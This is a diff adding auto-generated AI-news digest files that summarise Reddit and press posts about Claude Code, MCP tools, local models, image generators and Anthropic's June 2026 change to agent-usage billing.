[Github](https://github.com/yoloyash/overtchat). Also being upfront - I write code for a living and have been actively reviewing/debugging/changing things, but I did use quite a lot of AI lol. I promise it's not slop tho 😿 . Feedback is welcome! + +--- + +## [My AI runs 24/7 on Claude Code without -p. Here's the hook to do it yourself.](https://reddit.com/r/ClaudeAI/comments/1tcicvb/my_ai_runs_247_on_claude_code_without_p_heres_the/) +*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 +Tags: api_update, product_launch, developer_tool + +> **Saw the thread about the June 15 credit change. Built a drop-in `-p` replacement using hooks — no SDK credits needed.** edit: 29 stars! my first real repo \o/ A lot of people are upset about losing subsidized `-p` usage. I built something that gives you the same stateless, one-message-at-a-time behavior — but in interactive mode, on your regular subscription. **How it works:** 1. A supervisor launches Claude Code in interactive mode 2. A stop hook polls an inbox file for new messages 3. When a message arrives, the hook injects it — **one message per session** 4. The agent processes it and writes a response to an outbox file 5. The supervisor kills the session and restarts with **fresh context** 6. Next message gets a clean session — true stateless operation, like `-p` When idle, the hook polls internally and blocks with minimal ticks (~20 tokens each). No context inflation from idle waiting. 
**What you get:** - **Stateless per message** — each task gets fresh context, just like `-p` - **No SDK credits** — interactive mode uses your subscription - **Autonomous** — watches inbox, processes messages, writes responses - **Cheap idle** — minimal token overhead while waiting for work… + +--- + +## [[N] LangChain Interrupt 2026 announcements [N]](https://reddit.com/r/MachineLearning/comments/1td4v0a/n_langchain_interrupt_2026_announcements_n/) +*Reddit r/MachineLearning* | 14/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> LangChain just wrapped Day 1 of Interrupt 2026 and announced a few things worth knowing about: **SmithDB** — A purpose-built distributed database for agent observability. The problem they're solving: agent traces are getting too large and complex for general-purpose databases. SmithDB is built with Rust, Apache DataFusion, and Vortex, designed specifically for multimodal content and long-span tracing. They're reporting P50 latency of 92ms for loading trace trees and 400ms for full-text search, with up to 12x speedup over previous LangSmith performance. Architecture is object storage + small Postgres metadata store + stateless services, so it scales elastically and can be self-hosted. **Context Hub** — A centralized system for managing agent context (AGENTS.md files, skills, policies, memory) in LangSmith. The interesting part is they're working with MongoDB, Pinecone, Elastic, and Redis on an open standard for agent memory — covering episodic, semantic, and procedural memory with versioning and portability across frameworks. 
**Deep Agents v0.6** — New release includes ContextHubBackend integration, an installable code interpreter that gives agents a programmable workspace inside t… + +--- + +## [A VERY lightweight open web-search tool for smaller local LLMs](https://reddit.com/r/LocalLLaMA/comments/1tczzga/a_very_lightweight_open_websearch_tool_for/) +*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 +Tags: mcp, open_source + +> Hey everyone, Been playing around with local agent setups lately, mostly Cline/Roo with smaller models, and web search kept annoying me. Not because it doesn’t work, but because it usually throws way too much random page text into the context. small models really don’t handle that gracefully lol. they start with a simple search and suddenly half the prompt is scraped garbage. So I built bad boy, TinySearch. It’s a small open-source MCP tool that does web search, crawls a few pages, chunks/retrieves/reranks the useful bits, and gives the agent a much smaller context blob instead of dumping full pages. Repo: [https://github.com/MarcellM01/TinySearch](https://github.com/MarcellM01/TinySearch) Uses DuckDuckGo, Crawl4AI, dense + BM25-style retrieval, reranking, MCP, and it can also run as a FastAPI server. On my setup (M4 Mac and old ahh lenovo thinkpad) it usually takes around 5–12 seconds end to end, depending on the query/machine Not trying to replace real search infra or anything. it’s more just a little local research layer for people building agents who don’t want to spin up a whole backend just to let the model look stuff up. Still rough in places, but it’s been useful enough fo… + +--- + +## [Stable Diffusion WebUI Forge for AMD GPU](https://reddit.com/r/StableDiffusion/comments/1tcyyb4/stable_diffusion_webui_forge_for_amd_gpu/) +*Reddit r/StableDiffusion* | 14/05/2026 | Score: 1.00 +Tags: product_launch, developer_tool + +> It was a f\*cking chore that took almost 9 hours but i was able to FINALLLLLY MAKE IT !!!! I´ve reached it ! So... 
i am gonna share the files that made it possible. "Proof pics" "[https://github.com/lllyasviel/stable-diffusion-webui-forge](https://github.com/lllyasviel/stable-diffusion-webui-forge)" *The link should look like this* [\>>> Click Here to Download One-Click Package (CUDA 12.1 + Pytorch 2.3.1) <<<](https://github.com/lllyasviel/stable-diffusion-webui-forge/releases/download/latest/webui_forge_cu121_torch231.7z) Once its done click on extract into a folder... There click on update.bat.... then from there find all the files "down bellow in the picture" see what the files are and then either download the google drive links or copy paste the text i wrote down on facebook link and delete the original. Then u gotta click thru the webui-user.bat , webui.bat and run.bat... I have no clue in what order though ... good luck xd https://preview.redd.it/pvx8zl18m31h1.png?width=1920&format=png&auto=webp&s=8d5f9e3ba9fd355f0f9fffff89cfae57f3bef293 [copy and paste it all into these files till u see these \\"\_\_\_\_\_\_\_\_\_\_\_\\" in case u are copying i… + +--- + +## [Max20 user: anyone running Opus 4.7 as orchestrator + DeepSeek V4 as the worker via OpenRouter?](https://reddit.com/r/ClaudeAI/comments/1tcvngy/max20_user_anyone_running_opus_47_as_orchestrator/) +*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 +Tags: tool_update, agent_tool + +> I'm on the Max20 plan, thinking about a setup before I sink time into it. Want to hear from anyone actually running it, not theorycraft. **The idea:** Opus 4.7 in Claude Code as the orchestrator. It plans, breaks down tasks, reviews code quality, catches mistakes. The actual implementation, the bulk token spend, gets delegated to DeepSeek V4 Pro through OpenRouter. DeepSeek lands credibly close to Opus 4.7 on agentic coding benchmarks at a fraction of the output-token cost, so the bet is: keep Opus for the judgment-heavy parts, don't burn it on routine implementation. 
**I'm not expecting huge savings.** Realistically maybe an extra 30% (guessing here) effective Opus headroom if delegation works cleanly, and even less margin now that the limits situation has loosened a bit. So part of the question is genuinely whether 30% is worth the integration friction at all, or whether it's a fun idea that doesn't pay for itself. **Pre-empting the obvious responses, because I've already thought about these:** * *"Just use Sonnet for the cheap parts."* The easy answer. But I'm specifically curious whether an external model's cost delta beats the friction, and whether anyone's actually measured… + +--- + +## [Automated AI researcher running locally with llama.cpp](https://reddit.com/r/LocalLLaMA/comments/1tcu5r8/automated_ai_researcher_running_locally_with/) +*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Hi everyone, I'm happy to share ml-intern, which is a harness for agents to have tighter integration with Hugging Face's open-source libraries (transformers, datasets, trl, etc) and Hub infrastructure: [https://github.com/huggingface/ml-intern](https://github.com/huggingface/ml-intern) The harness is quite simple (basically tools + system prompt) and we built it initially for Claude Opus. However, now that open models are getting really good at agentic workflows, I just added support for running ml-intern with local models via llama.cpp or ollama. As you can see in the video, Qwen3.6-35B-A3B is able to SFT a model end-to-end by orchestrating CPU/GPU sandboxes and jobs on the Hub. I find this pretty neat because we can now have an AI researcher running 24/7 on a laptop, without maxing out token limits :) Anyway, I hope this is useful to the community and please let me know if there are any features that you'd like us to include. 
+ +--- + +## [OpenAI's deployment company move says more about the AI gap than any benchmark[D]](https://reddit.com/r/MachineLearning/comments/1tcsnng/openais_deployment_company_move_says_more_about/) +*Reddit r/MachineLearning* | 14/05/2026 | Score: 1.00 +Tags: api_update, tool_update + +> OpenAI launched a deployment company with $4B initial investment, 19 partner organizations, and acquired Tomoro (UK-based AI consultancy, \~150 engineers). The pitch: embed "Forward Deployed Engineers" into enterprises to help them actually use AI. This is basically the Palantir playbook. Send engineers into complex organizations, build deep integrations, become infrastructure. But the reason OpenAI is doing this tells you something uncomfortable: the gap between "model capability" and "production deployment" is widening, not closing. Over a million enterprises have adopted OpenAI products. But adoption and deployment are different things. Enterprises can sign up for an API key without having any workflow that actually benefits from it. The model gets better every quarter but the integration work stays hard. Daybreak (their new security product) is interesting but feels like a separate conversation. The deployment company is the signal. When the leading model company decides it needs its own consulting arm, it's acknowledging that selling API access isn't enough. The last mile is still human-intensive, context-specific, and resistant to automation. For the ML community this should… + +--- + +## [You're abusing your subscription with agentic 24/7 workflows and that's why we all get restrictions and limits](https://reddit.com/r/ClaudeAI/comments/1tcpxi2/youre_abusing_your_subscription_with_agentic_247/) +*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Subscription tiers were designed around interactive human use, but autonomous loops changed the usage. It makes sense that companies separate autonomous work from subscriptions. 
You and I know that when these tiers with these prices were introduced, agentic workflows were nowhere near where they are now. The past half a year has introduced everything from OpenClaw to Ralph loops to multi-agent orchestration and long-running autonomous tasks. All build on the previous ones, making the autonomous work longer, and minimising the time we're interacting with the AI while maximising the output. Do everyday users (the people the lower tiers of these subscriptions are meant for) need automatically running autonomous agents in scales? Some do, but rarely. The same people that use services like Agent SDK likely do it for work or income, optimise for maximum token burn for their buck, and as a result that non-interactive usage ends up balancing the subscription token limits lower. This of course leads to Anthropic seeking solutions for the outliers that burn so much they affect the limits for the gauss middle of the subscriber base. Seeing people now publishing workarounds instead of going A… + +--- + +## [I tested GPT-5.5 Codex against Opus 4.7 Claude Code, and it's about time Anthropic bros take pricing seriously.](https://reddit.com/r/ClaudeAI/comments/1tcpe8y/i_tested_gpt55_codex_against_opus_47_claude_code/) +*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> I've used Claude Code the most among AI coding agents. Sonnet, Opus, I've run them all. The reason is simple: they're beasts at tool execution and prompt following. That's also why Anthropic dominates API revenue from code agents. First-mover advantage is real, and developers love them. But GPT-5.5 Codex has been insanely good. When new models drop, I run real tests, not benchmarks. This time I built two tasks: Test 1: PR triage bot – GitHub MCP, scoring formula, Slack alerts, retries, strict TS, no "any". Test 2: Real-time code review UI – React, WebSockets, optimistic rollback, virtualized diff, WS reconnect. Same prompts. Same MCP (GitHub + Slack). Same machine. 
Here's what I found out: Claude Code (Opus 4.7): \- Verified MCP before writing a line \- Built 36 files in 12 minutes \- Wrote its own WebSocket smoke test (3ms broadcast) \- Zero errors first run \- Total cost: \~$2.50 Codex (GPT-5.5 via Cursor): \- Failed Task 1 (GitHub MCP not reachable – Cursor environment issue, not model) \- Task 2 shipped but needed a patch for infinite React loop \- 28 files, more compact architecture \- Total cost: \~$2.04 (18% cheaper) Claude shipped cleaner. Codex needed a patch pass. For co… + +--- + +## [Last week in Generative Image & Video](https://reddit.com/r/StableDiffusion/comments/1tcnpxj/last_week_in_generative_image_video/) +*Reddit r/StableDiffusion* | 14/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week: \- CausalCine — Interactive autoregressive framework for multi-shot video narratives. Content-Aware Memory Routing retrieves historical KV entries by attention relevance instead of temporal proximity, solving motion stagnation and semantic drift in long-rollout generation. Distilled to a few-step generator for real-time use. https://reddit.com/link/1tcnpxj/video/tbryyz3s611h1/player [Paper](http://arxiv.org/abs/2605.12496v1) | [GitHub](https://github.com/yihao-meng/CausalCine) \- SwiftI2V — Efficient 2K image-to-video generation. Low-res motion drafting followed by high-res refinement while preserving source image detail. https://reddit.com/link/1tcnpxj/video/8n6t3ust611h1/player [Paper](https://arxiv.org/abs/2605.06356) | [GitHub](https://github.com/hkust-longgroup/SwiftI2V) | [Project Page](https://hkust-longgroup.github.io/SwiftI2V/) \- OmniGen2 — Unified image generation model handling text-to-image, editing, subject-driven generation, and visual conditions in one architecture. 
| [Paper](http://arxiv.org/abs/2605.07254v1) https://preview.redd.it/iimjl0d2711h1.png?… + +--- + +## [Fully Realtime Interaction Models](https://reddit.com/r/LocalLLaMA/comments/1tckrpt/fully_realtime_interaction_models/) +*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> I know this model isn't open weights, and when it does drop it'll be over api, but I'm just posting to say the very MICROsecond that this drops you already know me and probably a bunch of other people are going to create an insane amount of distill data from the api. because at least to me the very idea of a model that has complete ability to act on its own accord is fascinating. I'm referencing this: [https://thinkingmachines.ai/blog/interaction-models/](https://thinkingmachines.ai/blog/interaction-models/) + +--- + +## [Open-source, self-updating wiki for your codebase](https://reddit.com/r/ClaudeAI/comments/1tcjv9b/opensource_selfupdating_wiki_for_your_codebase/) +*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> I got tired of re-explaining the same codebase context to coding agents. Stuff like: “we tried moving auth into middleware, but backed it out because it broke OAuth callbacks,” or “that weird retry logic exists because Stripe webhooks arrive out of order.” So I built Almanac. It gives your coding agent a self-updating wiki for the codebase. It updates from your repo, and conversations you have with Claude Code/Codex. The wiki lives locally in your repo as markdown. You can read it yourself, but the main consumer is the agent. It’s free and open source. Currently only macOS (would add Windows support if people find it useful) GitHub: [https://github.com/AlmanacCode/codealmanac](https://github.com/AlmanacCode/codealmanac) Curious how other people are handling project context for long-running AI coding work.
+ +--- + diff --git a/data/digest-2026-05-15.md b/data/digest-2026-05-15.md new file mode 100644 index 0000000..6efc82d --- /dev/null +++ b/data/digest-2026-05-15.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-15** | 15 stories | Auto-generated from 629 archived stories + +--- + +## [Got Claude Max from office for VS Code usage — what’s the best setup, workflow, and hidden tricks?](https://reddit.com/r/ClaudeAI/comments/1te36bt/got_claude_max_from_office_for_vs_code_usage/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: api_update, mcp, tool_update + +> Our office recently gave us access to Claude Max plan, mainly for using inside Visual Studio Code VS Code. I mostly work on web development, debugging, refactoring, API integration, SQL queries, and large codebase understanding. Right now I’m just using it like a normal chatbot, so I feel like I’m massively underusing it 😅 Wanted to know from experienced users: What’s your best VS Code setup with Claude? Any must-have extensions/tools/workflows? Best way to handle large repositories/context limits? How do you structure prompts for better code output? Any tricks for debugging, refactoring, architecture planning, or documentation generation? Is MCP worth setting up? If yes, what servers/tools are actually useful? Any productivity hacks most beginners don’t know? Would love to hear real-world workflows instead of generic AI tips. 
+ +--- + +## [I built a free Google search MCP that actually works(searching, fetching, with PDF)](https://reddit.com/r/ClaudeAI/comments/1tdw4us/i_built_a_free_google_search_mcp_that_actually/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: api_update, mcp, cli_tool + +> ✅ Actually works (tested 6 free MCPs, all failed) ✅ Search + URL extract in one MCP (replaces the usual search MCP + fetch MCP combo) ✅ Academic PDFs auto-handled (arxiv / biorxiv / Nature / OpenReview / NeurIPS / JMLR / PMLR / Springer / PubMed→PMC) ✅ Tiered extraction: `mode: "abstract"` returns \~1500 chars per result for cheap relevance triage before paying for full bodies ✅ Auto-bootstrap on first run (no manual `npm run bootstrap` step anymore) ✅ Auto CAPTCHA recovery (Chrome opens, human solves once, retries) ✅ No API key, no proxies, no solver **4 tools** * `search` SERP only * `search_parallel` N queries concurrently * `extract(url, mode?)` `full` / `abstract` / `metadata`. PDF detected via Content-Type, `%PDF` magic, `citation_pdf_url` meta, and per-domain rules * `search_extract(query, mode?)` defaults to `abstract`, so a 5-result survey costs \~7.5k chars instead of 40k **Why abstract mode** The old `search_extract` always fetched full bodies great for one URL, wasteful when you just want to know which of 5 results is worth reading. Abstract mode pulls PDF page 1 or HTML meta description (\~1500 chars), letting the agent triage relevance, then call `extract` with `mode… + +--- + +## [Claude for Healthcare launched in January — but medical imaging is the obvious gap. Anyone else noticing?](https://reddit.com/r/ClaudeAI/comments/1te160m/claude_for_healthcare_launched_in_january_but/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: mcp, tool_update + +> I’m a radiology resident in Istanbul, also building medical AI fine-tunes on the side (bone age estimation, fluoroscopy catheter orientation, a Turkish radiology report LLM). 
When Claude for Healthcare launched in January, I dug into the announcement. The architecture is impressive — CMS, ICD-10, PubMed connectors, HIPAA infrastructure, prior auth and chart review workflows. But it’s entirely text + workflow. Zero imaging. This is interesting because radiology is arguably where medical AI has the most mature, FDA-cleared products today. Yet Claude’s healthcare push doesn’t touch it. Two reads: 1. Strategic choice — Anthropic is betting on orchestration over vertical vision models. The expectation might be: Claude orchestrates, external vision specialists (MedGemma, proprietary models) get called as tools/MCP servers. 2. Genuine gap — imaging just isn’t on the roadmap yet. Either way, the imaging-as-MCP-server pattern feels underexplored. Anyone building in this direction? Especially curious if anyone’s exposed a fine-tuned medical vision model as an MCP server that Claude can call. + +--- + +## [Am I stupid for pivoting to Transparency with Agents over Memory after 6 months?](https://reddit.com/r/ClaudeAI/comments/1tdxi6r/am_i_stupid_for_pivoting_to_transparency_with/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> built an open source memory layer for ai agents. thought the obvious feature people would care about was persistent memory across restarts and shared memory between agents. that was the whole pitch. few months of actual user data in. most of the api calls aren't about memory at all. they're hitting the audit trail (what did the agent do and when), the loop detector (catching when an agent is stuck doing the same thing 20 times in a row), and the per-agent performance dashboard (which agent is wasting tokens, which one keeps crashing, who's drifting off goal). basically people don't really care that their agent remembers stuff across restarts. they care that they can see what it did and pull the plug when it goes off the rails. so i'm wondering if i should just flip the pitch. 
lead with "observability and accountability for ai agents" instead of "memory for ai agents". memory is table stakes at this point and mem0/zep already dominate that framing. loop detection + audit trail + performance scoring per agent feels like open territory. am i stupid? or is this the obvious move i somehow missed for 3 months + +--- + +## [I gave Claude Code a microphone via MCP. Now it asks me questions before writing code.](https://reddit.com/r/ClaudeAI/comments/1tdupsr/i_gave_claude_code_a_microphone_via_mcp_now_it/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> There are already a lot of dictation apps that let you skip typing when prompting Claude. You speak, they transcribe, and your prompt appears in the text box. But I wanted to try something different: what if Claude Code could ask for voice input by itself? So I gave Claude Code a microphone via MCP. Now Claude can ask a follow-up question when it needs more context, I answer by voice, and it continues the task with that context. It’s similar to those tool calls where Claude asks you to pick an option, but instead of choosing from a menu, you can just answer naturally by voice. I added this to my macOS dictation app, Spokenly. It runs a local MCP server, Claude connects to it, and Claude can call a tool to request voice input. Spokenly can also read Claude’s questions out loud with TTS, so it feels more like a real back-and-forth. It’s **completely free** with local models and your own API keys. Download: [https://spokenly.app/download](https://spokenly.app/download) If anyone tries it with Claude Code, I’d love to hear your feedback. + +--- + +## [Built a tool that publishes HTML artifacts securely behind company auth](https://reddit.com/r/ClaudeAI/comments/1tdudtk/built_a_tool_that_publishes_html_artifacts/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: mcp, cli_tool + +> Hey! 
Built [display.dev](http://display.dev) with a friend to make sharing Claude-generated HTML artifacts secure and easy between team members. Basically, it lets agents publish artifacts, you get back a URL. Your teammates can access it via Google/Microsoft SSO or with one-time passwords, and collaborate with inline comments. Works in CLI, or via MCP or web app. Its first purpose is to help teams collaborate better, but it's also useful for people who just want to share their artifacts with the public (optional visibility setting), or consultants/freelancers who want to share their work with clients. For larger teams, there are neat features like audit logs and stats, too. Anyway, let me know what you think - there's a free tier, of course. + +--- + +## [Anthropic built the agentic features. Now they're billing them separately.](https://reddit.com/r/ClaudeAI/comments/1tdjx4f/anthropic_built_the_agentic_features_now_theyre/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Starting June 15, Claude subscribers get a separate monthly credit for Agent SDK and `claude -p` usage: $200/mo for Max 20x, $100 for Max 5x, $20 for Pro. Once you burn through it, programmatic usage stops unless you've opted into extra usage billing at API rates. Your interactive Claude Code and chat usage stays on the subscription pool, untouched. I spent the last day digging into the community reaction across Reddit, GitHub, HN, and tech press. Tracked roughly 120 distinct opinions. Here's what I found. **The sentiment split** - About 60% negative (credit is too small, feels like a value regression) - About 25% pragmatic ("this was inevitable, the old model was broken") - About 15% neutral to supportive ("interactive use is untouched, this is fair") Theo Browne (T3.gg) put it bluntly: anyone using T3 Code, Conductor, Zed, or `claude -p` in CI scripts had their effective usage cut by 25x.
He said he now has to make the Claude Code experience on T3 Code "significantly worse." Ben Hylak (co-founder of Raindrop.ai) responded: "This is either really silly, or shows how bad of a spot Anthropic is in re: GPUs." Theo also said: "Framing this as a free credit instead of a regression for… + +--- + +## [Adaptive Markdown](https://reddit.com/r/ClaudeAI/comments/1tdg7yn/adaptive_markdown/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> I’ve been working on an open-source document format / viewer idea I’m calling Adaptive Markdown. The basic idea is: instead of a document being static text it's controlled by coding agents. You interact with the document more like a live workspace. This has different implications depending on what you are doing. I made a short video demo here: [https://youtu.be/H4MnFs8irm8](https://youtu.be/H4MnFs8irm8) The thing I’m most excited about is academic / technical reading. In a few years I don’t think people will just read papers passively. I think they’ll translate passages, ask questions, generate examples, explore alternate proofs, run code, attach notes, convert math to Lean when possible, and keep all of that inside the document instead of scattered across chats and notebooks. This is trivial to do inside a browser with coding agent that has access to JS, CSS etc. Some possible use cases I’m thinking about: \-Turning articles and books into personalized learning objects \- lecture notes with automatically maintained structure \-documents with embedded code, tables, consoles, images, audio, or video \-AI-generated alt text and descriptions Incorporate Adaptive Markdown into automat… + +--- + +## [Memory drift? Context bloat? 
A Claude Code skill I wrote to manage long-running memory libraries](https://reddit.com/r/ClaudeAI/comments/1tdtmr6/memory_drift_context_bloat_a_claude_code_skill_i/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 0.99 +Tags: api_update, developer_tool + +> I've been running Claude Code's auto-memory on the same project for about three months. Roughly a month in, the library started getting hard to use: the same lesson recorded under three different filenames, frontmatter missing on half the files, searching for "that bug we fixed last month" returned nothing useful. Every new session, Claude loaded more and more memory files, and the context window kept getting crowded with irrelevant entries. I wrote a skill that enforces a naming schema and a bash audit script that flags drift. Sharing in case it's useful. # What the skill does Claude Code's auto-memory (v2.1.59+) writes plain markdown to `~/.claude/projects/<slug>/memory/`. The files are yours to read, edit, and version. What it doesn't enforce is structure — naming, required fields, or a Why section on each lesson. * **Schema on top of auto-memory.** `<type>_<topic>.md` naming, required frontmatter (name / description / type), Why section on feedback entries. Auto-memory still writes; the skill makes Claude write to a spec. * **Phrase-triggered review.** "Audit memory" runs the script. "Review session" walks the recent session and surfaces what's worth keeping.… + +--- + +## [SailPoint Unveils Agentic Fabric for AI Agent Security](https://aimagazine.com/news/sailpoint-unveils-agentic-fabric-for-ai-agent-security) +*AI Magazine* | Score: 0.70 +Tags: product_launch, agent_tool + +--- + +## [Open-weights vs. closed models: Nano Banana Pro was nerf'ed](https://reddit.com/r/StableDiffusion/comments/1tecqkx/openweights_vs_closed_models_nano_banana_pro_was/) +*Reddit r/StableDiffusion* | 16/05/2026 | Score: 1.00 +Tags: open_source + +> Companies think that they can nerf the model and people won't notice. 
Here is exhibit 1: Nano Banana Pro has fallen far from the tree. In our independent evaluation, Nano Banana Pro's image generation capability as of recently is worse than FLUX.2 \[dev\] and far from GPT-Image 2 Low. Just a reminder that no weights, not your models. https://preview.redd.it/kqon8d0jyd1h1.png?width=2212&format=png&auto=webp&s=61f3ced9f3b8f6d497d482494117e18c514bb6f3 You can explore our full calibration test set at [https://tests.drawthings.ai/generate](https://tests.drawthings.ai/generate) and [https://tests.drawthings.ai/edit](https://tests.drawthings.ai/edit). We will release the score on our full private test set soon. # 1. Charts **Top: Nano Banana Pro** **Bottom: GPT-Image 2 Low** Prompt: >A pie chart showing browser market share: Chrome 65%, Safari 20%, Firefox 10%, Other 5%. Each section should be appropriately sized and labeled with the browser name and percentage. Nano Banana Pro no longer seems able to make a simple labeled chart reliably. https://preview.redd.it/q67mipl5yd1h1.png?width=1024&format=png&auto=webp&s=4e8d0024331dfd906cda3da5e3cc307b6aec1f9e https:/… + +--- + +## [AllenAI has been iterating on their MolmoAct2 models for robotics](https://reddit.com/r/LocalLLaMA/comments/1te9unl/allenai_has_been_iterating_on_their_molmoact2/) +*Reddit r/LocalLLaMA* | 15/05/2026 | Score: 1.00 +Tags: open_source + +> r/AllenAI is cooking with MolmoAct2, a 5B vision-language-action model for robot control. 
They keep releasing new fine-tunes on different kinds of robotics datasets, including (but not limited to, and they keep releasing new ones): * https://huggingface.co/allenai/MolmoAct2-LIBERO - general robotics tasks * https://huggingface.co/allenai/MolmoAct2-DROID - interactive robotics tasks * https://huggingface.co/allenai/MolmoAct2-BimanualYAM - absolute joint-pose control * https://huggingface.co/allenai/MolmoAct2-SO100_101 - also absolute joint-pose control AllenAI has released these as ***fully open source*** models, publishing not only their weights but also their **complete** training datasets (including pretraining), their training software source code, and technical papers describing the theory, training, and assessments of these models. If anyone is fiddling with robots controlled via LLM inference, you should give MolmoAct2 models a look. + +--- + +## [Gemma4 26b MoE running in MLX with turboquant (and custom kernel)](https://reddit.com/r/LocalLLaMA/comments/1te6os6/gemma4_26b_moe_running_in_mlx_with_turboquant_and/) +*Reddit r/LocalLLaMA* | 15/05/2026 | Score: 1.00 +Tags: cli_tool + +> TL;DR I spent a few crazy evenings this past week seeing if I could get Gemma4 running with proper turbo quant and rotating KV cache support. 
The answer was yes, and I'm now able to run Gemma4 26b on my MacBook Air M5 at 128k context with 4 concurrent batches 😄 At 8k context running with no mmap, it beats llama.cpp at prompt processing, generation speed, and runtime memory: |backend|model|bpw|pp tok/s|gen tok/s|runtime mem| |:-|:-|:-|:-|:-|:-| |llama.cpp|IQ4\_XS + q4\_0 KV + flash-attn|4.25|260.6|14.66|16.0 GB| |MLX (ours)|nvfp4 + polar2|4.5|348.4|17.15|15.22 GB| It took a lot of hand-tuning to get to this speed, including a custom kernel for the SWA layers in order to get the actual runtime 2bit memory savings that enable higher batch sizes whilst staying close to full fp16 prompt processing speed The prompt processing speed scales relatively well with batch size - the major gains though are in the text generation - running a 512 token-long prompt on a 32 GB M5: |B|pp tok/s|gen tok/s| |:-|:-|:-| |1|353|16.0| |4|429|24.9| |8|451|32.4| |16|451|44.2| |32|450|48.0| |64|448|54.6| |128|440|54.0| If you want to download it and serve it yourself, you can open a terminal to a directory y… + +--- + +## [Notes from evaluating a customer support chat agent system: heuristic evaluators give false signal, retrieval bugs masquerade as LLM failures, and the cost/quality Pareto frontier is rarely where you think [D]](https://reddit.com/r/MachineLearning/comments/1te38yg/notes_from_evaluating_a_customer_support_chat/) +*Reddit r/MachineLearning* | 15/05/2026 | Score: 1.00 +Tags: api_update + +> Posting some practical findings from a structured audit of a production customer support RAG system. Methodology and caveats up front. 
**Methodology:** * 6 representative turns from a real production session as the eval set (small, acknowledged limitation) * LLM-as-judge using Claude Haiku 4.5, scoring relevance/accuracy/helpfulness/overall on 0-10, returning per-turn reasoning strings for verification * Same judge across all conditions, same questions, same retrieval state where possible * Production model held constant while isolating retrieval changes, then swept across 5 LLMs once retrieval was fixed * Live pricing from OpenRouter /models API rather than estimates **Findings:** 1. **Heuristic evaluation produces zero signal.** The existing evaluator counted keywords and source references. Output was numerical but uncorrelated with response quality. LLM judges with explicit rubrics caught hallucinations, identified zero-retrieval turns, and produced reasoning that could be spot-checked. The cost is real but small (cents per run) compared to shipping undetected regressions. 2. **Retrieval failures present as generation failures.** A turn where the agent said "I don't have inform… + +--- + +## [Beta testers wanted: MCP server that cuts Claude Code token burn 45–72% on architectural questions (TS/Python/Go)](https://reddit.com/r/ClaudeAI/comments/1tdy7ww/beta_testers_wanted_mcp_server_that_cuts_claude/) +*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 +Tags: mcp + +> Claude Code learns your codebase by brute force every session. A single architectural question such as; "Where does request validation happen?" can chew through 40+ tool calls and 100k tokens reconstructing context. Worse, the architectural decisions that *govern* your code, your ADRs, design docs, "we did it this way because" reasoning are completely invisible to it. Claude will happily propose changes that break constraints you wrote down two months ago. 
I built an MCP server that pre-computes a structured atlas of your codebase (LSP symbols + ADRs + git history + test associations) and serves it to Claude in a fraction of the calls via compact chunks at execution time. Internal benchmarks show **45–72% token reduction on architectural-intent prompts**, replicated across TypeScript (hono), Python (httpx), and Go (cobra) targets. Methodology is paired-mode LLM-judge with pre-registered thresholds. Full rubric and benchmarks repo are public. I also saw cleaner scope adherence and better design choices when implementing new features, driven by the `impact_of_change` tool surfacing constraints before Claude proposes work. v1.0.0 is planned to ship next week. Before then I hoped to f… + +--- + diff --git a/data/digest-2026-05-16.md b/data/digest-2026-05-16.md new file mode 100644 index 0000000..1c37077 --- /dev/null +++ b/data/digest-2026-05-16.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-16** | 15 stories | Auto-generated from 407 archived stories + +--- + +## [Follow-up: the Claude design-spec library is 100 apps now, iOS + Android.](https://reddit.com/r/ClaudeAI/comments/1tevt37/followup_the_claude_designspec_library_is_100/) +*Reddit r/ClaudeAI* | 16/05/2026 | Score: 1.00 +Tags: mcp, open_source, developer_tool, cli_tool + +> Yesterday I posted about turning 50 apps into Claude-readable design specs. It did better than expected, and the two asks in the comments were: more apps, and Android. Both done. The library is now: \- 100 apps (was 50) \- iOS and Android spec for every one The Android pass surfaced something the iOS-only version hid. The problem: an iOS-only spec quietly encodes HIG assumptions you didn't know you were making. 
